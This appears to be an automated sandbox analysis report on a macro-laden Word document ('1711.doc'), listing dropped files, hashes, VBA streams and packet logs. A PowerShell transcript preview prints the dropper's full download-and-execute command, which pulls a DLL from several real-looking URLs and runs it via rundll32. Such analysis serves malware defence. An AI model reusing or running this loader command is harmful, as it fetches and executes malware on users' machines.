                                                                                                                                                                                                                  SHA1:208B7F23A6F20232174437F051EE1C94FD2E196A
                                                                                                                                                                                                                  SHA-256:A452D65B472CB605519456B0DC34426B1E9868B82E1BECF69067D40005A92821
                                                                                                                                                                                                                  SHA-512:06C9DBC47E2535CD3AF441617A1D4F38E7177508E2E295D893EDE86A5B0C820C1BEEC66BEC9FE6C8565A713C55370211B7AC2498E6D81674275438D81AFFF41F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20211122110132..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 813435 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell $dfkj=$strs="http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/".Split(",");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth="C:\ProgramData\"+$r1+".dll";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp="C:\Windows\SysWow64\rundll32.exe";$a=$tpth+",f"+$r2;Start-Process $fp -ArgumentList $a;break;}};;IEX $dfkj..Process ID: 6468..PSVersion: 5.1.17134.1..PSEdition: Des
                                                                                                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                                                                                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):7250
                                                                                                                                                                                                                  Entropy (8bit):3.1679989221091893
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:cEj+AbCEH+AbuEAc+AbhGEA+AbNEe+Ab/Ee+AbPE6w9+Ab1wTEz+AbG:cY+38+DJc+iGr+MZ+65+6tg+ECo+z
                                                                                                                                                                                                                  MD5:D0F6C98FB282DF59111DB522D6E9108B
                                                                                                                                                                                                                  SHA1:809FA55C7EB553FB09B8035DB2A92EDB60B799E8
                                                                                                                                                                                                                  SHA-256:6FDC668D8B86845B76461C63DA8F7DBB10204D557D9F46A36D14855A6CFC4B9F
                                                                                                                                                                                                                  SHA-512:D7577FFA762E8A867E009E4D3BE5923CF2A30D995F96B3DB023DDD32570D0AF41B014B23B0C8C4C05C62C539BC4C8FD4FF83BF8DEAD046E25E498BE7BB7C8B10
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                                                                                                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211122_190130_406.etl
                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                  Entropy (8bit):3.3934816676816406
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:dCD/o+QK5Xu932YgEmCAvI2lESkDP4flT2mYFzuUMCNrJRrl52:0LOmY723uIC/8
                                                                                                                                                                                                                  MD5:83F6606FCBD342F5D823A014F0F2702F
                                                                                                                                                                                                                  SHA1:5A8E3060F13E0D7F9DD148B3199F486B5F79EEA9
                                                                                                                                                                                                                  SHA-256:F9807DBCF7698CA1DECCEA377A9794482E46F0A95D1300DBC56262F9221894BB
                                                                                                                                                                                                                  SHA-512:05DEFA64EAB3DE871B8EADC53E7BEB33B993118EAF0860817D8296B992C4B95197DD1B8BC84AE62FFE5241DE5EFC6EAB33BA8AC8E6D2486E28F2F6446E50A9C1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .... ... ....................................... ...!...............................|............................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... ......'.[............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.1.2.2._.1.9.0.1.3.0._.4.0.6...e.t.l.........P.P.....|...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):485376
                                                                                                                                                                                                                  Entropy (8bit):7.178849265977026
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12288:bdv8jkvzqZvv2wLB4mTi12yD88kYwZ1h1:b2Zvv2cTTi1v0Z1h
                                                                                                                                                                                                                  MD5:6ED0F0B0046573CFBA56C98152B44F28
                                                                                                                                                                                                                  SHA1:53FC583339C441DFFBFCF2C2F1F660C1CAD96714
                                                                                                                                                                                                                  SHA-256:A84F4C76EF86D165088979CB91506B65C3D84CB92386E3AA68EABA4EFE0C9B5E
                                                                                                                                                                                                                  SHA-512:5DEF2C24FBA65FB8CADE6954609F29DDC175DB1FD1A797BEFF68C2FCDA44E8E7E751294498806191120807EBC07948CA4EE9F23DE402959CD0EE9DD4FF263AEA
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................................................PE..L....L.a...........!................&X....................................................@.......................................... ...D...................p...3......................................@............................................text............................... ..`.rdata...<.......>..................@..@.data...,%..........................@....rsrc....D... ...F..................@..@.reloc...3...p...4...4..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  File type:Microsoft Word 2007+
                                                                                                                                                                                                                  Entropy (8bit):7.953932715889731
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                                                                                                                                                                                                                  • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                                                                                                                                                                                                                  • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                                                                                                                                                                                                                  • ZIP compressed archive (8000/1) 5.23%
                                                                                                                                                                                                                  File name:1711.doc
                                                                                                                                                                                                                  File size:145337
                                                                                                                                                                                                                  MD5:85ab297345c97bca1a5004dc537f6c1c
                                                                                                                                                                                                                  SHA1:0b609d0b86f1b29410451306c173c7fac013d5a7
                                                                                                                                                                                                                  SHA256:31daa06dc4c4f5dda5e557e8422d9b31655b1322e610bb42096a2a060727927d
                                                                                                                                                                                                                  SHA512:c5f246b510db5ba25b29338a5fc1182ac56738be51ebc6c8f5fb0e004a5b42e61fe69a304efcd5e000382609f1f524f329bd41322b5e5f67a986deea40cd4ec6
                                                                                                                                                                                                                  SSDEEP:3072:hwQhXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqDK3CXV:yeXw50+OukzVXV2uhDCxXV
                                                                                                                                                                                                                  File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                  Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                                                                                  Static OLE Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                                                                                  OLE File "/opt/package/joesandbox/database/analysis/526179/sample/1711.doc"

                                                                                                                                                                                                                  Indicators

                                                                                                                                                                                                                  Has Summary Info:False
                                                                                                                                                                                                                  Application Name:unknown
                                                                                                                                                                                                                  Encrypted Document:False
                                                                                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                                                                                  Flash Objects Count:
                                                                                                                                                                                                                  Contains VBA Macros:True

                                                                                                                                                                                                                  Summary

                                                                                                                                                                                                                  Author:1
                                                                                                                                                                                                                  Template:Normal.dotm
                                                                                                                                                                                                                  Last Saved By:1
                                                                                                                                                                                                                  Revion Number:39
                                                                                                                                                                                                                  Total Edit Time:144
                                                                                                                                                                                                                  Create Time:2021-11-15T15:39:00Z
                                                                                                                                                                                                                  Last Saved Time:2021-11-16T19:13:00Z
                                                                                                                                                                                                                  Number of Pages:1
                                                                                                                                                                                                                  Number of Words:9
                                                                                                                                                                                                                  Number of Characters:53
                                                                                                                                                                                                                  Creating Application:Microsoft Office Word
                                                                                                                                                                                                                  Security:0

                                                                                                                                                                                                                  Document Summary

                                                                                                                                                                                                                  Number of Lines:1
                                                                                                                                                                                                                  Number of Paragraphs:1
                                                                                                                                                                                                                  Thumbnail Scaling Desired:false
                                                                                                                                                                                                                  Company:
                                                                                                                                                                                                                  Contains Dirty Links:false
                                                                                                                                                                                                                  Shared Document:false
                                                                                                                                                                                                                  Changed Hyperlinks:false
                                                                                                                                                                                                                  Application Version:12.0000

                                                                                                                                                                                                                  Streams with VBA

                                                                                                                                                                                                                  VBA File Name: bvkaeiku2ncoi2uho3ihdes.cls, Stream Size: 9859
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:VBA/bvkaeiku2ncoi2uho3ihdes
                                                                                                                                                                                                                  VBA File Name:bvkaeiku2ncoi2uho3ihdes.cls
                                                                                                                                                                                                                  Stream Size:9859
                                                                                                                                                                                                                  Data ASCII:. . . . . . . . . ^ . . . . . . . . . . . . . . . j . . . b . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                  Data Raw:01 16 01 00 01 f0 00 00 00 5e 07 00 00 d4 00 00 00 02 02 00 00 ff ff ff ff 6a 07 00 00 62 19 00 00 00 00 00 00 01 00 00 00 ea eb ff 49 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  VBA Code

                                                                                                                                                                                                                  Streams

                                                                                                                                                                                                                  Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 521
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:PROJECT
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Stream Size:521
                                                                                                                                                                                                                  Entropy:5.22231541281
                                                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                                                  Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = b v k a e i k u 2 n c o i 2 u h o 3 i h d e s / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 F 5 D F 3 5 6 0 D E A 6 8 E E 6 8 E E 6 C F 2 6 C F 2 " . . D
                                                                                                                                                                                                                  Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 62 76 6b 61 65 69 6b 75 32 6e 63 6f 69 32 75 68 6f 33 69 68 64 65 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30
                                                                                                                                                                                                                  Stream Path: PROJECTwm, File Type: data, Stream Size: 74
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:PROJECTwm
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:74
                                                                                                                                                                                                                  Entropy:3.31599778695
                                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                                  Data ASCII:b v k a e i k u 2 n c o i 2 u h o 3 i h d e s . b . v . k . a . e . i . k . u . 2 . n . c . o . i . 2 . u . h . o . 3 . i . h . d . e . s . . . . .
                                                                                                                                                                                                                  Data Raw:62 76 6b 61 65 69 6b 75 32 6e 63 6f 69 32 75 68 6f 33 69 68 64 65 73 00 62 00 76 00 6b 00 61 00 65 00 69 00 6b 00 75 00 32 00 6e 00 63 00 6f 00 69 00 32 00 75 00 68 00 6f 00 33 00 69 00 68 00 64 00 65 00 73 00 00 00 00 00
                                                                                                                                                                                                                  Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4778
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:4778
                                                                                                                                                                                                                  Entropy:4.85191198027
                                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                                                                                                                                                                  Data Raw:cc 61 88 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                                                                                                                  Stream Path: VBA/dir, File Type: data, Stream Size: 841
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:VBA/dir
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:841
                                                                                                                                                                                                                  Entropy:6.48895457492
                                                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                                                  Data ASCII:. E . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . o . . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . N c .
                                                                                                                                                                                                                  Data Raw:01 45 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 6f c3 8b 63 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.473294020 CET4975280192.168.2.572.167.40.83
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.639899969 CET804975272.167.40.83192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.641463041 CET4975280192.168.2.572.167.40.83
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.759536028 CET4975280192.168.2.572.167.40.83
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.930659056 CET804975272.167.40.83192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.974144936 CET804975272.167.40.83192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.979284048 CET804975272.167.40.83192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.979330063 CET804975272.167.40.83192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.979474068 CET4975280192.168.2.572.167.40.83
                                                                                                                                                                                                                  Nov 22, 2021 11:01:44.979598045 CET4975280192.168.2.572.167.40.83
                                                                                                                                                                                                                  Nov 22, 2021 11:01:45.145000935 CET804975272.167.40.83192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.144756079 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.309940100 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.312969923 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.313236952 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.478471041 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488010883 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488051891 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488082886 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488152027 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488194942 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488244057 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488785028 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488817930 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488864899 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488902092 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488929033 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488956928 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.488981962 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.489039898 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.489113092 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655143023 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655184031 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655213118 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655240059 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655267954 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655292988 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655293941 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655328035 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655350924 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655405045 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655435085 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655462027 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655488968 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655493975 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655517101 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655544996 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655574083 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.655605078 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822607040 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822638035 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822658062 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822676897 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822695017 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822715044 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822757959 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822772980 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822822094 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822840929 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822863102 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822882891 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822902918 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822920084 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822921991 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822968006 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.822972059 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.823007107 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.823026896 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.823087931 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.823143005 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.823164940 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.823184013 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.823204994 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.823230028 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.823252916 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.997756958 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.997827053 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.997878075 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.997889996 CET4975380192.168.2.550.62.141.15
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.997930050 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.997981071 CET804975350.62.141.15192.168.2.5
                                                                                                                                                                                                                  Nov 22, 2021 11:01:48.998045921 CET4975380192.168.2.550.62.141.15
